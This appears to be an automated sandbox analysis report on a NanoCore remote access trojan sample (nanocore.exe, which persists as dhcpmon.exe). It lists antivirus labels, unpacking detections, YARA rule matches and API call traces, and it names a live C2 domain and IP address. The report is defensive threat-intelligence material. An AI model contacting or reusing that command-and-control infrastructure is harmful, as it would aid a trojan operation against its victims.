      Source: 11.2.dhcpmon.exe.4920000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 13.2.dhcpmon.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.2.nanocore.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.2.nanocore.exe.49c0000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.nanocore.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.nanocore.exe.4a90000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.nanocore.exe.58b0000.12.unpackAvira: Label: TR/NanoCore.fadte
      Source: 2.1.nanocore.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 11.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 11.2.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.1.nanocore.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 13.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7

      Compliance:

      barindex
      Detected unpacking (creates a PE file in dynamic memory)Show sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 11.2.dhcpmon.exe.4920000.9.unpack
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 2.2.nanocore.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 10.2.nanocore.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack
      Source: nanocore.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Binary string: wntdll.pdbUGP source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_00405301
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C94
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_004026BC FindFirstFileA,1_2_004026BC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_00405301
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,8_2_00405C94
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_004026BC FindFirstFileA,8_2_004026BC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00404A29 FindFirstFileExW,10_2_00404A29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00404A29 FindFirstFileExW,10_1_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00404A29 FindFirstFileExW,11_1_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00404A29 FindFirstFileExW,13_2_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00404A29 FindFirstFileExW,13_1_00404A29

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: chinomso.duckdns.org
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: chinomso.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.4:49740 -> 213.208.152.210:7688
      Source: Joe Sandbox ViewASN Name: NEXTLAYER-ASAT NEXTLAYER-ASAT
      Source: unknownDNS traffic detected: queries for: chinomso.duckdns.org
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EA0
      Source: nanocore.exe, 00000001.00000002.650327824.0000000000A4A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: nanocore.exe, 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
